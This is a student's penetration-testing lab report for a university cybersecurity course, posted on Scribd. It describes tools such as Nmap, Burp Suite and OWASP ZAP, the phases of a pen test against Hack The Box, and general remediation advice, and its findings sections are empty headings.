Scribd
Upload
5 views

202151059_lab5

This lab assignment focuses on conducting penetration testing on a selected website to identify security vulnerabilities and assess the application's security strength. Utilizing tools like Nmap, Burp Suite, and OWASP ZAP, the testing follows phases of reconnaissance, scanning, vulnerability assessment, and post-exploitation. The findings emphasize the importance of implementing remediation measures to enhance security and mitigate risks associated with identified vulnerabilities.

Uploaded by

gugulothuvamshi51059
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
5 views

202151059_lab5

This lab assignment focuses on conducting penetration testing on a selected website to identify security vulnerabilities and assess the application's security strength. Utilizing tools like Nmap, Burp Suite, and OWASP ZAP, the testing follows phases of reconnaissance, scanning, vulnerability assessment, and post-exploitation. The findings emphasize the importance of implementing remediation measures to enhance security and mitigate risks associated with identified vulnerabilities.

Uploaded by

gugulothuvamshi51059
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 17

Software and Cybersecurity (CS/IT 445)

Lab Assignment 5: Penetration Testing


Guguloth vamshi
202151059
Objective:
Perform penetration testing on a selected website (public, non-
government, or a specifically designed vulnerable website) and
create a detailed penetration testing report based on your findings.

Introduction :

This lab assignment help us conduct a penetration test on a chosen target


website. The objective is to detect potential security vulnerabilities and
evaluate the overall security strength of the application. Penetration testing,
or ethical hacking, is a controlled simulation of cyberattacks aimed at
identifying weak points in systems or applications before malicious hackers
exploit them.

In this assignment, we will utilize industry-recognized tools such as Burp


Suite, OWASP ZAP, and Nmap to follow the various phases of a
penetration test. These phases include reconnaissance, scanning, vulnerability
analysis, exploitation, and post-exploitation. It's important to ensure that the
testing is conducted on authorized and lawful platforms such as OWASP
Juice Shop, Hack The Box, or Damn Vulnerable Web Application
(DVWA)—systems intentionally created for security testing.

Tools Used:

1. Nmap

• Purpose: Nmap (Network Mapper) is a versatile tool used for


discovering networks and auditing security. It helps testers detect hosts,
open ports, running services, and possible system vulnerabilities.

2. Whois Tool
• Purpose: The Whois tool is primarily used during the reconnaissance
phase. It helps gather details about domain registration and other
associated information to aid in identifying potential target information.

3. Burp Suite

• Purpose: Burp Suite is a robust platform for identifying and exploiting


vulnerabilities in web applications. It plays a vital role in vulnerability
assessment and exploitation.
• Features:
o Proxy: Captures and inspects HTTP/HTTPS requests and
responses between the client and server.
o Spider: Automatically maps the entire website by following all
links and discovering pages.
o Scanner: Performs automated scans to detect common web
vulnerabilities like SQL injection, cross-site scripting (XSS), and
authentication flaws.
o Intruder: Enables automated attack tasks, such as brute-forcing
login credentials or injecting custom payloads.
o Repeater: Allows you to modify and resend specific HTTP
requests to analyze how the application responds to changes.
• Usage: Burp Suite is leveraged during both the vulnerability
identification and exploitation phases to detect and exploit security
weaknesses in web applications.

Methodology (tools and techniques used)


This penetration testing exercise was carried out using a systematic
approach based on widely accepted industry practices. The testing
process was divided into several phases, each employing specific
tools and techniques to identify vulnerabilities and assess the
security posture of the target website.
1. Reconnaissance
The reconnaissance phase involved gathering as much information
as possible about the target website without directly interacting with
it (passive) and through limited direct interaction (active).
• Tools Used:
o Whois: Collected domain registration information to
understand the ownership and infrastructure of the target.
o nslookup: Used to identify IP addresses associated with
the domain and possible subdomains.
2. Scanning
In this phase, the website was scanned to identify open ports,
services, and other network-related vulnerabilities that could be
exploited.
• Tools Used:
o Nmap: Performed network scanning to discover open
ports, identify running services, and reveal possible
vulnerabilities. The tool also provided information on
service versions and operating system details, which
helped in focusing further testing efforts.
3. Vulnerability Assessment
This phase aimed to detect vulnerabilities within the web application,
including issues related to input validation, session management,
and improper configurations.
• Tools Used:
o Burp Suite: Used to inspect and manipulate HTTP/HTTPS
requests and responses. The tool's proxy, scanner, and
intruder features were utilized to assess the web
application for common vulnerabilities.
o OWASP ZAP: Another web vulnerability scanner, used to
automate the discovery of issues such as SQL injection,
XSS, and broken authentication.
o Nikto: Employed to scan the web server for known
vulnerabilities, including misconfigurations and outdated
software.

5. Post-Exploitation
Post-exploitation focused on analyzing potential data access,
privilege escalation, and the persistence of attacks in a controlled
environment. While no real post-exploitation actions were carried
out due to ethical considerations, this phase would typically assess
what an attacker could gain after successful exploitation.

Select a Website: Hack The Box,


Choosing apublic website, preferably a vulnerable testing site
Ensuring the website is legal to test on (avoid testing on live, non-
consented
websites).
WEBSITE DETAILS:
GATHERING INFORMATION ABOUT WEBSITE THAT IM USING
FINDINGS:
1. scanning the web application:
proxying and intercepting:
CRAWLING AND MAPPING:
Remediation Recommendations:
1. Close Unnecessary Ports: Limit the attack surface by closing
non-essential ports and services.
2. Implement Input Validation: Protect against SQL injection and
XSS by ensuring all user inputs are properly sanitized and
validated on both client and server sides.
3. Strengthen Session Management: Ensure session tokens are
securely managed, use HTTPS across all pages, and
implement stronger encryption and session timeout settings to
prevent session hijacking.
By implementing these remediation steps, the website's overall
security will be significantly improved, reducing the risk of
unauthorized access, data breaches, and exploitation of
vulnerabilities.

Conclusion :
The objective of this penetration testing exercise was to assess the
security posture of a selected target website through a series of
systematic steps, including reconnaissance, scanning, vulnerability
assessment, and exploitation. By using a structured methodology
and industry-standard tools such as Whois, Nmap, Burp Suite, and
OWASP ZAP, the test successfully identified multiple vulnerabilities.
These vulnerabilities highlight potential risks in areas like port
configuration, input validation, session management, and overall
application security.
The testing process revealed several critical points:
• Reconnaissance provided valuable insights into the target's
infrastructure.
• Nmap scans identified open ports and active services,
expanding the potential attack surface.
• Vulnerability scanning with Burp Suite and OWASP ZAP
exposed issues such as SQL Injection, Cross-Site Scripting
(XSS), and poor input validation.
Although exploitation was confined to controlled environments, these
findings demonstrate the need for stronger security measures to
mitigate risks and safeguard against unauthorized access or data
breaches.

You might also like